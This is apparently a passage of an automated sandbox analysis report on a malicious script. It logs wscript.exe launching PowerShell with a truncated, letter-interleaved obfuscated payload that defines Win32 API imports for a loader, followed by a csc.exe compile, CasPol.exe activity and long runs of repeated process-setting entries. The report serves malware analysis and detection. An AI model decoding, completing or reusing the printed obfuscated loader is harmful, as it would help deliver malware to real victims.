          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00C5CF89 pushad ; ret 4_2_00C5CF95
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C677C7 push es; ret 4_2_07C67810
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C625D3 push esp; iretd 4_2_07C625D9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6D5A0 push es; ret 4_2_07C6D5B0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C61CA3 push eax; retf 4_2_07C61CA9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C67B91 push es; ret 4_2_07C67BA0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C67A9E push es; ret 4_2_07C67AB0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07C6E8B0 push es; ret 4_2_07C6E8C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CBCDA1 push es; retf 0007h4_2_07CBCDA2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CBF579 push esp; ret 4_2_07CBF57D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CBE4D0 push ss; retf 0007h4_2_07CBE4D2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CBE4F1 push ss; retf 0007h4_2_07CBE4F2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07CB7348 push esp; iretd 4_2_07CB7351
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D3C9B0 push es; ret 4_2_07D3CC90
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D3BCF1 push es; ret 4_2_07D3BD00
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07D3CC82 push es; ret 4_2_07D3CC90
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdlineJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dllJump to dropped file
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
